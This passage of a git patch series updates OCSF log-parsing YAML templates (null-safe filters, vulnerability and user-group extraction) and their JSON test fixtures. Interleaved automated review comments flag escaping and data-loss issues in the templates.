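Review bot: The new filters in `@@ -267` and `@@ -309` guard only the last segment with `.get()` — `parse_event.message.actor.process.container.image.get('tag')`, `parse_event.message.actor.process.group.get('uid')` — while `actor`, `process`, `container`, `image` and `group` are still reached by plain attribute access, so an event that lacks one of those parents presumably still hits an undefined-attribute error rather than a false filter (whether it errors or silently passes depends on the engine's undefined type, which this diff does not show). The same shape recurs in the remaining rewritten filters of this commit (`@@ -327` through `@@ -988`), so whatever is decided should be applied to all of them. Chaining the lookups with an empty default keeps the filter false on a missing parent, e.g. `filter: "{{ parse_event.message.get('actor', {}).get('process', {}).get('container', {}).get('image', {}).get('tag') != None }}"`; if the engine guarantees a chainable undefined, a one-line comment at the first such filter saying so would save the next reader the same question.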
@@ -327,11 +327,11 @@ stages: - set: process.user.id: - "{{ parse_event.message.actor.process.euid }}" - filter: "{{ parse_event.message.actor.process.euid != null }}" + filter: "{{ parse_event.message.actor.process.get('euid') != None }}" - set: process.user.id: - "{{ parse_event.message.actor.process.user.uid }}" - filter: "{{ parse_event.message.actor.process.user.uid != null }}" + filter: "{{ parse_event.message.actor.process.user.get('uid') != None }}" - set: process.user.group.id: > [{%- for item in parse_event.message.actor.process.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}] @@ -363,11 +363,11 @@ stages: - set: process.parent.group.id: - "{{ parse_event.message.actor.process.parent_process.egid }}" - filter: "{{ parse_event.message.actor.process.parent_process.egid != null }}" + filter: "{{ parse_event.message.actor.process.parent_process.get('egid') != None }}" - set: process.parent.group.id: - "{{ parse_event.message.actor.process.parent_process.group.uid }}" - filter: "{{ parse_event.message.actor.process.parent_process.group.uid != null }}" + filter: "{{ parse_event.message.actor.process.parent_process.group.get('uid') != None }}" - set: process.parent.group.name: "{{ parse_event.message.actor.process.parent_process.group.name }}" process.parent.name: "{{ parse_event.message.actor.process.parent_process.name }}" 
@@ -381,11 +381,11 @@ stages: - set: process.parent.user.id: - "{{ parse_event.message.actor.process.parent_process.euid }}" - filter: "{{ parse_event.message.actor.process.parent_process.euid != null }}" + filter: "{{ parse_event.message.actor.process.parent_process.get('euid') != None }}" - set: process.parent.user.id: - "{{ parse_event.message.actor.process.parent_process.user.uid }}" - filter: "{{ parse_event.message.actor.process.parent_process.user.uid != null }}" + filter: "{{ parse_event.message.actor.process.parent_process.user.get('uid') != None }}" - set: process.parent.user.name: "{{ parse_event.message.actor.process.parent_process.user.name }}" 
@@ -404,23 +404,23 @@ stages: - set: network.direction: - internal - filter: "{{ parse_event.message.connection_info.boundary != null and parse_event.message.connection_info.boundary == 'Internal' }}" + filter: "{{ parse_event.message.connection_info.get('boundary') != None and parse_event.message.connection_info.boundary == 'Internal' }}" - set: network.direction: - external - filter: "{{ parse_event.message.connection_info.boundary != null and parse_event.message.connection_info.boundary == 'External' }}" + filter: "{{ parse_event.message.connection_info.get('boundary') != None and parse_event.message.connection_info.boundary == 'External' }}" - set: network.direction: - inbound - filter: "{{ parse_event.message.connection_info.direction != null and parse_event.message.connection_info.direction == 'Inbound' }}" + filter: "{{ parse_event.message.connection_info.get('direction') != None and parse_event.message.connection_info.direction == 'Inbound' }}" - set: network.direction: - outbound - filter: "{{ parse_event.message.connection_info.direction != null and parse_event.message.connection_info.direction == 'Outbound' }}" + filter: "{{ parse_event.message.connection_info.get('direction') != None and parse_event.message.connection_info.direction == 'Outbound' }}" - set: network.direction: - unknown - filter: "{{ parse_event.message.connection_info.direction != null and parse_event.message.connection_info.direction == 'Unknown' or parse_event.message.connection_info.boundary != null and parse_event.message.connection_info.boundary == 'Unknown' }}" + filter: "{{ parse_event.message.connection_info.get('direction') != None and parse_event.message.connection_info.direction == 'Unknown' or parse_event.message.connection_info.get('boundary') != None and parse_event.message.connection_info.boundary == 'Unknown' }}" pipeline_object_device: actions: 
@@ -441,12 +441,12 @@ stages: filter: "{{ parse_event.message.device.ip | is_ipaddress }}" - set: host.mac: ["{{ parse_event.message.device.mac }}"] - filter: "{{ parse_event.message.device.mac != null }}" + filter: "{{ parse_event.message.device.get('mac') != None }}" - set: host.os.name: "{{ parse_event.message.device.os.name }}" - set: host.os.type: "{{ parse_event.message.device.os.type }}" - filter: "{{ parse_event.message.device.os.type != null and parse_event.message.device.os.type in ['Linux','Windows','Android','macOS','iOS'] }}" + filter: "{{ parse_event.message.device.os.get('type') != None and parse_event.message.device.os.type in ['Linux','Windows','Android','macOS','iOS'] }}" - set: host.os.version: "{{ parse_event.message.device.os.build }}" host.risk.static_level: "{{ parse_event.message.device.risk_level }}" @@ -505,7 +505,7 @@ stages: actions: - set: source.domain: "{{ parse_event.message.src_endpoint.domain }}" - filter: "{{ parse_event.message.src_endpoint.domain != null }}" + filter: "{{ parse_event.message.src_endpoint.get('domain') != None }}" - set: source.geo.city_name: "{{ parse_event.message.src_endpoint.location.city }}" source.geo.continent_name: "{{ parse_event.message.src_endpoint.location.continent }}" @@ -516,7 +516,7 @@ stages: source.geo.region_iso_code: "{{ parse_event.message.src_endpoint.location.region }}" - set: source.domain: "{{ parse_event.message.src_endpoint.hostname }}" - filter: "{{ parse_event.message.src_endpoint.hostname != null }}" + filter: "{{ parse_event.message.src_endpoint.get('hostname') != None }}" - set: source.ip: "{{ parse_event.message.src_endpoint.ip }}" filter: "{{ parse_event.message.src_endpoint.ip | is_ipaddress }}" 
@@ -525,10 +525,10 @@ stages: source.port: "{{ parse_event.message.src_endpoint.port }}" - set: network.application: "{{ parse_event.message.src_endpoint.svc_name }}" - filter: "{{ parse_event.message.src_endpoint.svc_name != null }}" + filter: "{{ parse_event.message.src_endpoint.get('svc_name') != None }}" - set: destination.domain: "{{ parse_event.message.dst_endpoint.domain }}" - filter: "{{ parse_event.message.dst_endpoint.domain != null }}" + filter: "{{ parse_event.message.dst_endpoint.get('domain') != None }}" - set: destination.geo.city_name: "{{ parse_event.message.dst_endpoint.location.city }}" destination.geo.continent_name: "{{ parse_event.message.dst_endpoint.location.continent }}" @@ -540,14 +540,14 @@ stages: destination.geo.region_iso_code: "{{ parse_event.message.dst_endpoint.location.region }}" - set: destination.domain: "{{ parse_event.message.dst_endpoint.hostname }}" - filter: "{{ parse_event.message.dst_endpoint.hostname != null }}" + filter: "{{ parse_event.message.dst_endpoint.get('hostname') != None }}" - set: destination.ip: "{{ parse_event.message.dst_endpoint.ip }}" destination.mac: "{{ parse_event.message.dst_endpoint.mac }}" destination.port: "{{ parse_event.message.dst_endpoint.port }}" - set: network.application: "{{ parse_event.message.dst_endpoint.svc_name }}" - filter: "{{ parse_event.message.dst_endpoint.svc_name != null }}" + filter: "{{ parse_event.message.dst_endpoint.get('svc_name') != None }}" pipeline_object_process: actions: @@ -557,7 +557,7 @@ stages: - set: container.image.tag: - "{{ parse_event.message.process.container.image.tag }}" - filter: "{{ parse_event.message.process.container.image.tag != null }}" + filter: "{{ parse_event.message.process.container.image.get('tag') != None }}" - set: container.labels: "{{ parse_event.message.process.container.image.labels }}" orchestrator.type: "{{ parse_event.message.process.container.orchestrator }}" 
@@ -599,11 +599,11 @@ stages: - set: process.group.id: - "{{ parse_event.message.process.egid }}" - filter: "{{ parse_event.message.process.egid != null }}" + filter: "{{ parse_event.message.process.get('egid') != None }}" - set: process.group.id: - "{{ parse_event.message.process.group.uid }}" - filter: "{{ parse_event.message.process.group.uid != null }}" + filter: "{{ parse_event.message.process.group.get('uid') != None }}" - set: process.group.name: "{{ parse_event.message.process.group.name }}" process.name: "{{ parse_event.message.process.name }}" @@ -617,11 +617,11 @@ stages: - set: process.user.id: - "{{ parse_event.message.process.euid }}" - filter: "{{ parse_event.message.process.euid != null }}" + filter: "{{ parse_event.message.process.get('euid') != None }}" - set: process.user.id: - "{{ parse_event.message.process.user.uid }}" - filter: "{{ parse_event.message.process.user.uid != null }}" + filter: "{{ parse_event.message.process.user.get('uid') != None }}" - set: process.user.group.id: > [{%- for item in parse_event.message.process.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}] @@ -635,11 +635,11 @@ stages: - set: process.parent.group.id: - "{{ parse_event.message.process.parent_process.egid }}" - filter: "{{ parse_event.message.process.parent_process.egid != null }}" + filter: "{{ parse_event.message.process.parent_process.get('egid') != None }}" - set: process.parent.group.id: - "{{ parse_event.message.process.parent_process.group.uid }}" - filter: "{{ parse_event.message.process.parent_process.group.uid != null }}" + filter: "{{ parse_event.message.process.parent_process.group.get('uid') != None }}" - set: process.parent.group.name: "{{ parse_event.message.process.parent_process.group.name }}" process.parent.name: "{{ parse_event.message.process.parent_process.name }}" 
@@ -653,11 +653,11 @@ stages: - set: process.parent.user.id: - "{{ parse_event.message.process.parent_process.euid }}" - filter: "{{ parse_event.message.process.parent_process.euid != null }}" + filter: "{{ parse_event.message.process.parent_process.get('euid') != None }}" - set: process.parent.user.id: - "{{ parse_event.message.process.parent_process.user.uid }}" - filter: "{{ parse_event.message.process.parent_process.user.uid != null }}" + filter: "{{ parse_event.message.process.parent_process.user.get('uid') != None }}" - set: process.parent.user.name: "{{ parse_event.message.process.parent_process.user.name }}" - set: @@ -768,7 +768,7 @@ stages: file.x509.serial_number: "{{ parse_event.message.driver.file.signature.certificate.serial_number }}" file.x509.subject.distinguished_name: "{{ parse_event.message.driver.file.signature.certificate.subject }}" file.x509.version_number: "{{ parse_event.message.driver.file.signature.certificate.version }}" - filter: "{{ parse_event.message.driver.file != null }}" + filter: "{{ parse_event.message.driver.get('file') != None }}" - set: file.hash.md5: > @@ -783,7 +783,7 @@ stages: {%- for item in parse_event.message.driver.file.hashes -%}{%- if item.algorithm == 'CTPH' -%}{{ item.value }}{%- endif -%}{%- endfor -%} file.hash.tlsh: > {%- for item in parse_event.message.driver.file.hashes -%}{%- if item.algorithm == 'TLSH' -%}{{ item.value }}{%- endif -%}{%- endfor -%} - filter: "{{ parse_event.message.driver.file != null }}" + filter: "{{ parse_event.message.driver.get('file') != None }}" - set: file.accessed: "{{ parse_event.message.job.file.accessed_time_dt or parse_event.message.job.file.accessed_time | to_rfc3339 }}" 
@@ -803,7 +803,7 @@ stages: file.x509.serial_number: "{{ parse_event.message.job.file.signature.certificate.serial_number }}" file.x509.subject.distinguished_name: "{{ parse_event.message.job.file.signature.certificate.subject }}" file.x509.version_number: "{{ parse_event.message.job.file.signature.certificate.version }}" - filter: "{{ parse_event.message.job.file != null }}" + filter: "{{ parse_event.message.job.get('file') != None }}" - set: file.hash.md5: > @@ -818,7 +818,7 @@ stages: {%- for item in parse_event.message.job.file.hashes -%}{%- if item.algorithm == 'CTPH' -%}{{ item.value }}{%- endif -%}{%- endfor -%} file.hash.tlsh: > {%- for item in parse_event.message.job.file.hashes -%}{%- if item.algorithm == 'TLSH' -%}{{ item.value }}{%- endif -%}{%- endfor -%} - filter: "{{ parse_event.message.job.file != null }}" + filter: "{{ parse_event.message.job.get('file') != None }}" - set: file.accessed: "{{ parse_event.message.module.file.accessed_time_dt or parse_event.message.module.file.accessed_time | to_rfc3339 }}" @@ -838,7 +838,7 @@ stages: file.x509.serial_number: "{{ parse_event.message.module.file.signature.certificate.serial_number }}" file.x509.subject.distinguished_name: "{{ parse_event.message.module.file.signature.certificate.subject }}" file.x509.version_number: "{{ parse_event.message.module.file.signature.certificate.version }}" - filter: "{{ parse_event.message.module.file != null }}" + filter: "{{ parse_event.message.module.get('file') != None }}" - set: file.hash.md5: 
> @@ -853,7 +853,7 @@ stages: {%- for item in parse_event.message.module.file.hashes -%}{%- if item.algorithm == 'CTPH' -%}{{ item.value }}{%- endif -%}{%- endfor -%} file.hash.tlsh: > {%- for item in parse_event.message.module.file.hashes -%}{%- if item.algorithm == 'TLSH' -%}{{ item.value }}{%- endif -%}{%- endfor -%} - filter: "{{ parse_event.message.module.file != null }}" + filter: "{{ parse_event.message.module.get('file') != None }}" pipeline_category_system_activity: actions: @@ -935,10 +935,10 @@ stages: [ {%- for item in parse_event.message.answers -%} { - {%- if item.class != null -%}"class": "{{item.class}}",{%- endif -%} - {%- if item.type != null -%}"type": "{{item.type}}",{%- endif -%} - {%- if item.ttl != null -%}"ttl": "{{item.ttl}}",{%- endif -%} - {%- if item.rdata != null -%}"data": "{{item.rdata}}",{%- endif -%} + {%- if item.get('class') != None -%}"class": "{{item.class}}",{%- endif -%} + {%- if item.get('type') != None -%}"type": "{{item.type}}",{%- endif -%} + {%- if item.get('ttl') != None -%}"ttl": "{{item.ttl}}",{%- endif -%} + {%- if item.get('rdata') != None -%}"data": "{{item.rdata}}",{%- endif -%} } {%- endfor -%} ] @@ -946,11 +946,11 @@ stages: - set: dns.question.class: - "{{ parse_event.message.query.class }}" - filter: "{{ parse_event.message.query.class != null }}" + filter: "{{ parse_event.message.query.get('class') != None }}" - set: dns.question.type: - "{{ parse_event.message.query.type }}" - filter: "{{ parse_event.message.query.type != null }}" + filter: "{{ parse_event.message.query.get('type') != None }}" - set: dns.response_code: "{{ parse_event.message.rcode }}" http.response.status_code: "{{ parse_event.message.response.code }}" 
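Review bot: The rewritten `dns.answers` entries in `@@ -935` still interpolate `item.class`, `item.type`, `item.ttl` and `item.rdata` into a hand-built object literal as `"data": "{{item.rdata}}",` with no escaping, so a value containing a double quote, backslash or newline — and rdata is response content controlled by whoever answers the query — yields a malformed literal for whatever parses the rendered block; the `.get()` guards added here leave that unchanged. Escaping at the interpolation point, e.g. `{%- if item.get('rdata') != None -%}"data": {{ item.rdata | tojson }},{%- endif -%}` (if the engine exposes Jinja's `tojson` filter), keeps the structure intact regardless of content and is worth applying to all four fields. The surrounding `[` / `]` of the template are outside the hunk.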
@@ -968,13 +968,13 @@ stages: - set: email.from.address: - "{{ parse_event.message.email.from }}" - filter: "{{ parse_event.message.email.from != null }}" + filter: "{{ parse_event.message.email.get('from') != None }}" - set: email.message_id: "{{ parse_event.message.email.message_uid }}" - set: email.reply_to.address: - "{{ parse_event.message.email.reply_to }}" - filter: "{{ parse_event.message.email.reply_to != null }}" + filter: "{{ parse_event.message.email.get('reply_to') != None }}" - set: email.subject: "{{ parse_event.message.email.subject }}" email.to.address: "{{ parse_event.message.email.to }}" @@ -988,10 +988,10 @@ stages: url.original: "{{ parse_event.message.url.url_string }}" - set: email.attachments.file.size: "{{ parse_event.message.file.size }}" - filter: "{{ parse_event.message.file.size != null }}" + filter: "{{ parse_event.message.file.get('size') != None }}" - set: email.attachments.file.name: "{{ parse_event.message.file.name }}" - filter: "{{ parse_event.message.file.name != null }}" + filter: "{{ parse_event.message.file.get('name') != None }}" pipeline_category_application_activity: actions: From 77e4aab251fb7b3ddc15dff7e8a94c9d6c54e3fa Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Mon, 16 Sep 2024 17:30:34 +0200 Subject: [PATCH 035/317] fixup! fix(OCSF): fix the way to extract vulnerabilities --- OCSF/ocsf/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml index 668a21e40..2fe0e1157 100644 --- a/OCSF/ocsf/ingest/parser.yml +++ b/OCSF/ocsf/ingest/parser.yml @@ -891,7 +891,7 @@ stages: - set: ocsf.vulnerabilities: > [ - {%- for item in parse_event.message.vulnerabilities -%} + {%- for item in parse_event.message.vulnerabilities[1:] -%} { 'id': '{{item.cve.uuid}}', 'version': '{{item.cve.cvss.version}}', From 4dc2f3a3ee111e6d570f3f29985d777d42736dea Mon Sep 17 00:00:00 2001 
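Review bot: `parse_event.message.vulnerabilities[1:]` in the `@@ -891` hunk silently drops the first vulnerability of every event, and neither the diff nor the "fixup!" subject says why the first element is to be skipped. If the first entry is known to be something other than a vulnerability, the loop deserves a why-comment, e.g. `{#- first element skipped: <reason> -#}` placed before the `for`; if it is not, the slice loses detection data and the unsliced `parse_event.message.vulnerabilities` should be restored. The enclosing `ocsf.vulnerabilities` template continues outside the hunk.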
From: Sebastien Quioc Date: Mon, 16 Sep 2024 18:16:14 +0200 Subject: [PATCH 036/317] fix(OCSF): change the way to extract the list of group that a user belong to --- OCSF/ocsf/_meta/fields.yml | 5 ++ OCSF/ocsf/ingest/parser.yml | 62 ++++++++++++------- OCSF/ocsf/tests/test_account_change_1.json | 8 --- OCSF/ocsf/tests/test_api_activity_1.json | 4 -- OCSF/ocsf/tests/test_api_activity_2.json | 23 ++++--- OCSF/ocsf/tests/test_authentication_1.json | 8 --- OCSF/ocsf/tests/test_authentication_2.json | 8 --- OCSF/ocsf/tests/test_authentication_3.json | 8 --- OCSF/ocsf/tests/test_process_activity_1.json | 4 -- OCSF/ocsf/tests/test_process_activity_2.json | 4 -- OCSF/ocsf/tests/test_system_activity_1.json | 4 -- OCSF/ocsf/tests/test_system_activity_2.json | 4 -- .../test_windows_resource_activity_1.json | 4 -- 13 files changed, 60 insertions(+), 86 deletions(-) diff --git a/OCSF/ocsf/_meta/fields.yml b/OCSF/ocsf/_meta/fields.yml index 1205bf0ae..153d909a6 100644 --- a/OCSF/ocsf/_meta/fields.yml +++ b/OCSF/ocsf/_meta/fields.yml @@ -20,6 +20,11 @@ ocsf.class_uid: name: ocsf.class_uid type: long +ocsf.user.groups: + description: The list of groups that the user belong to + name: ocsf.user.groups + type: array + ocsf.vulnerabilities: description: '' name: ocsf.vulnerabilities diff --git a/OCSF/ocsf/ingest/parser.yml b/OCSF/ocsf/ingest/parser.yml index 2fe0e1157..0c57d8113 100644 --- a/OCSF/ocsf/ingest/parser.yml +++ b/OCSF/ocsf/ingest/parser.yml 
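Review bot: The description of the new `ocsf.user.groups` field reads `The list of groups that the user belong to`; suggest `description: The list of groups that the user belongs to (objects with uid and name)`, since `type: array` alone tells a consumer nothing about the element shape that the parser produces.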
@@ -339,12 +339,6 @@ stages: process.user.group.name: > [{%- for item in parse_event.message.actor.process.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}] - user.group.id: > - [{%- for item in parse_event.message.actor.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}] - - user.group.name: > - [{%- for item in parse_event.message.actor.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}] - process.parent.user.group.id: > [{%- for item in parse_event.message.actor.process.parent_process.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}] @@ -360,6 +354,17 @@ stages: user.name: "{{ parse_event.message.actor.user.name }}" process.parent.command_line: "{{ parse_event.message.actor.process.parent_process.cmd_line }}" process.parent.end: "{{ parse_event.message.actor.process.parent_process.terminated_time | to_rfc3339 }}" + - set: + ocsf.user.groups: > + [ + {%- for item in parse_event.message.actor.user.groups -%} + { + {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%} + {%- if item.name -%}'name': '{{item.name}}',{%- endif -%} + }, + {%- endfor -%} + ] + filter: "{{parse_event.message.actor.user.get('groups') != None}}" - set: process.parent.group.id: - "{{ parse_event.message.actor.process.parent_process.egid }}" 
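Review bot: The new `ocsf.user.groups` template in `@@ -360` builds a list literal by string interpolation — `'uid': '{{item.uid}}',` — so a group uid or name containing a single quote breaks the literal, and `{%- if item.uid -%}` also drops a present-but-falsy uid such as `0`. The same block is duplicated verbatim in `@@ -708`, `@@ -866` and `@@ -919` of this commit, differing only in the source path. Building each entry as a dict with `{% set %}` and appending it to a list, or escaping at the interpolation point (`'uid': {{ item.uid | tojson }},` if the engine exposes that filter) together with a presence test of the form `item.get('uid') != None` like the sibling filters use, addresses both issues; a single shared definition would also keep the four copies from drifting.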
@@ -708,11 +713,16 @@ stages: user.target.name: "{{ parse_event.message.user.name }}" - set: - user.target.group.id: > - [{%- for item in parse_event.message.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}] - - user.target.group.name: > - [{%- for item in parse_event.message.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}] + ocsf.user.groups: > + [ + {%- for item in parse_event.message.user.groups -%} + { + {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%} + {%- if item.name -%}'name': '{{item.name}}',{%- endif -%} + }, + {%- endfor -%} + ] + filter: "{{parse_event.message.user.get('groups') != None}}" pipeline_object_file: actions: @@ -866,11 +876,16 @@ stages: process.exit_code: "{{ parse_event.message.exit_code }}" - set: - user.target.group.id: > - [{%- for item in parse_event.message.job.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}] - - user.target.group.name: > - [{%- for item in parse_event.message.job.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}] + ocsf.user.groups: > + [ + {%- for item in parse_event.message.job.user.groups -%} + { + {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%} + {%- if item.name -%}'name': '{{item.name}}',{%- endif -%} + }, + {%- endfor -%} + ] + filter: "{{parse_event.message.job.user.get('groups') != None}}" pipeline_category_findings: actions: 
@@ -919,11 +934,16 @@ stages: group.id: "{{ parse_event.message.group.uid }}" - set: - user.changes.group.id: > - [{%- for item in parse_event.message.user_result.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}] - - user.changes.group.name: > - [{%- for item in parse_event.message.user_result.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}] + ocsf.user.groups: > + [ + {%- for item in parse_event.message.user_result.groups -%} + { + {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%} + {%- if item.name -%}'name': '{{item.name}}',{%- endif -%} + }, + {%- endfor -%} + ] + filter: "{{parse_event.message.user_result.get('groups') != None}}" pipeline_category_network_activity: actions: diff --git a/OCSF/ocsf/tests/test_account_change_1.json b/OCSF/ocsf/tests/test_account_change_1.json index 9a09eed7b..cbe774508 100644 --- a/OCSF/ocsf/tests/test_account_change_1.json +++ b/OCSF/ocsf/tests/test_account_change_1.json @@ -39,16 +39,8 @@ "ip": "52.95.4.21" }, "user": { - "group": { - "id": [], - "name": [] - }, "id": "arn:aws:sts::112233445566:assumed-role/Admin/Admin-user", "target": { - "group": { - "id": [], - "name": [] - }, "id": "AROA2W7SOKHEXAMPLE:Admin-user", "name": "test_user2" } diff --git a/OCSF/ocsf/tests/test_api_activity_1.json b/OCSF/ocsf/tests/test_api_activity_1.json index 1c78111ee..393135ad3 100644 --- a/OCSF/ocsf/tests/test_api_activity_1.json +++ b/OCSF/ocsf/tests/test_api_activity_1.json @@ -45,10 +45,6 @@ "ip": "205.8.181.128" }, "user": { - "group": { - "id": [], - "name": [] - }, "id": "arn:aws:iam::1111111111111:user/Level6", "name": "Level6" }, diff --git a/OCSF/ocsf/tests/test_api_activity_2.json b/OCSF/ocsf/tests/test_api_activity_2.json index d53c7b8a7..843efb4c2 100644 --- a/OCSF/ocsf/tests/test_api_activity_2.json +++ b/OCSF/ocsf/tests/test_api_activity_2.json 
@@ -28,7 +28,20 @@ "activity_id": 1, "activity_name": "Create", "class_name": "API Activity", - "class_uid": 6003 + "class_uid": 6003, + "user": { + "groups": [ + { + "name": "system:bootstrappers" + }, + { + "name": "system:nodes" + }, + { + "name": "system:authenticated" + } + ] + } }, "package": { "description": [], @@ -44,14 +57,6 @@ "path": "/api/v1/nodes" }, "user": { - "group": { - "id": [], - "name": [ - "system:authenticated", - "system:bootstrappers", - "system:nodes" - ] - }, "id": "heptio-authenticator-aws:123456789012:ABCD1234567890EXAMPLE", "name": "system:node:ip-192-001-02-03.ec2.internal" }, diff --git a/OCSF/ocsf/tests/test_authentication_1.json b/OCSF/ocsf/tests/test_authentication_1.json index 3bae772bc..e59719910 100644 --- a/OCSF/ocsf/tests/test_authentication_1.json +++ b/OCSF/ocsf/tests/test_authentication_1.json @@ -46,17 +46,9 @@ "ip": "192.0.2.0" }, "user": { - "group": { - "id": [], - "name": [] - }, "id": "arn:aws:iam::111122223333:user/anaya", "name": "anaya", "target": { - "group": { - "id": [], - "name": [] - }, "id": "arn:aws:iam::111122223333:user/anaya" } }, diff --git a/OCSF/ocsf/tests/test_authentication_2.json b/OCSF/ocsf/tests/test_authentication_2.json index 41c2d96a4..5badf14db 100644 --- a/OCSF/ocsf/tests/test_authentication_2.json +++ b/OCSF/ocsf/tests/test_authentication_2.json @@ -61,18 +61,10 @@ }, "user": { "domain": "ATTACKRANGE", - "group": { - "id": [], - "name": [] - }, "id": "NT AUTHORITY\\SYSTEM", "name": "WIN-DC-725$", "target": { "domain": "NT AUTHORITY", - "group": { - "id": [], - "name": [] - }, "id": "NT AUTHORITY\\SYSTEM", "name": "SYSTEM" } diff --git a/OCSF/ocsf/tests/test_authentication_3.json b/OCSF/ocsf/tests/test_authentication_3.json index 3504b1c8a..7bb0e9688 100644 --- a/OCSF/ocsf/tests/test_authentication_3.json +++ b/OCSF/ocsf/tests/test_authentication_3.json 
@@ -53,17 +53,9 @@ "port": 0 }, "user": { - "group": { - "id": [], - "name": [] - }, "id": "NULL SID", "target": { "domain": "EC2AMAZ-6KJ2BPP", - "group": { - "id": [], - "name": [] - }, "id": "NULL SID", "name": "Administrator" } diff --git a/OCSF/ocsf/tests/test_process_activity_1.json b/OCSF/ocsf/tests/test_process_activity_1.json index 02bc3a582..a3ec8acfe 100644 --- a/OCSF/ocsf/tests/test_process_activity_1.json +++ b/OCSF/ocsf/tests/test_process_activity_1.json @@ -63,10 +63,6 @@ }, "user": { "domain": "ATTACKRANGE", - "group": { - "id": [], - "name": [] - }, "id": "ATTACKRANGE\\Administrator", "name": "Administrator" } diff --git a/OCSF/ocsf/tests/test_process_activity_2.json b/OCSF/ocsf/tests/test_process_activity_2.json index d2fc4367f..e22931998 100644 --- a/OCSF/ocsf/tests/test_process_activity_2.json +++ b/OCSF/ocsf/tests/test_process_activity_2.json @@ -54,10 +54,6 @@ }, "user": { "domain": "LOGISTICS", - "group": { - "id": [], - "name": [] - }, "id": "S-1-5-21-1135140816-2109348461-2107143693-500", "name": "Administrator" } diff --git a/OCSF/ocsf/tests/test_system_activity_1.json b/OCSF/ocsf/tests/test_system_activity_1.json index e106135ff..40267e6ea 100644 --- a/OCSF/ocsf/tests/test_system_activity_1.json +++ b/OCSF/ocsf/tests/test_system_activity_1.json @@ -41,10 +41,6 @@ }, "user": { "domain": "DIR", - "group": { - "id": [], - "name": [] - }, "id": "NT AUTHORITY\\SYSTEM", "name": "STLDIRDC1$" } diff --git a/OCSF/ocsf/tests/test_system_activity_2.json b/OCSF/ocsf/tests/test_system_activity_2.json index 268062b61..aa6ef7511 100644 --- a/OCSF/ocsf/tests/test_system_activity_2.json +++ b/OCSF/ocsf/tests/test_system_activity_2.json @@ -41,10 +41,6 @@ }, "user": { "domain": "SESTEST", - "group": { - "id": [], - "name": [] - }, "id": "SESTEST\\splunker", "name": "splunker" } diff --git a/OCSF/ocsf/tests/test_windows_resource_activity_1.json b/OCSF/ocsf/tests/test_windows_resource_activity_1.json index cae726797..145a83f39 100644 
--- a/OCSF/ocsf/tests/test_windows_resource_activity_1.json +++ b/OCSF/ocsf/tests/test_windows_resource_activity_1.json @@ -47,10 +47,6 @@ }, "user": { "domain": "SOI", - "group": { - "id": [], - "name": [] - }, "id": "NT AUTHORITY\\SYSTEM", "name": "SZUSOIDC1$" } From 3dd5b2df0be0e00181e00e5c5becaca2ef12c801 Mon Sep 17 00:00:00 2001 
From: Pierre Penhouet Date: Mon, 16 Sep 2024 23:56:50 +0200 Subject: [PATCH 037/317] Forwarder log format --- SekoiaIO/forwarder_log/CHANGELOG.md | 8 ++ SekoiaIO/forwarder_log/_meta/fields.yml | 95 ++++++++++++++++++ SekoiaIO/forwarder_log/_meta/logo.png | Bin 0 -> 14799 bytes SekoiaIO/forwarder_log/_meta/manifest.yml | 9 ++ .../_meta/smart-descriptions.json | 63 ++++++++++++ SekoiaIO/forwarder_log/ingest/parser.yml | 37 +++++++ SekoiaIO/forwarder_log/tests/action_log.json | 28 ++++++ .../forwarder_log/tests/da_queue_log.json | 32 ++++++ SekoiaIO/forwarder_log/tests/input_tcp.json | 26 +++++ SekoiaIO/forwarder_log/tests/input_udp.json | 26 +++++ .../forwarder_log/tests/memory_queue_log.json | 32 ++++++ SekoiaIO/forwarder_log/tests/output_log.json | 27 +++++ SekoiaIO/forwarder_log/tests/stats.json | 27 +++++ 13 files changed, 410 insertions(+) create mode 100644 SekoiaIO/forwarder_log/CHANGELOG.md create mode 100644 SekoiaIO/forwarder_log/_meta/fields.yml create mode 100644 SekoiaIO/forwarder_log/_meta/logo.png create mode 100644 SekoiaIO/forwarder_log/_meta/manifest.yml create mode 100644 SekoiaIO/forwarder_log/_meta/smart-descriptions.json create mode 100644 SekoiaIO/forwarder_log/ingest/parser.yml create mode 100644 SekoiaIO/forwarder_log/tests/action_log.json create mode 100644 SekoiaIO/forwarder_log/tests/da_queue_log.json create mode 100644 SekoiaIO/forwarder_log/tests/input_tcp.json create mode 100644 SekoiaIO/forwarder_log/tests/input_udp.json create mode 100644 SekoiaIO/forwarder_log/tests/memory_queue_log.json create mode 100644 SekoiaIO/forwarder_log/tests/output_log.json create mode 100644 SekoiaIO/forwarder_log/tests/stats.json diff --git a/SekoiaIO/forwarder_log/CHANGELOG.md b/SekoiaIO/forwarder_log/CHANGELOG.md new file mode 100644 index 000000000..11bddf32c --- /dev/null +++ b/SekoiaIO/forwarder_log/CHANGELOG.md 
@@ -0,0 +1,8 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] diff --git a/SekoiaIO/forwarder_log/_meta/fields.yml b/SekoiaIO/forwarder_log/_meta/fields.yml new file mode 100644 index 000000000..a172f31a9 --- /dev/null +++ b/SekoiaIO/forwarder_log/_meta/fields.yml 
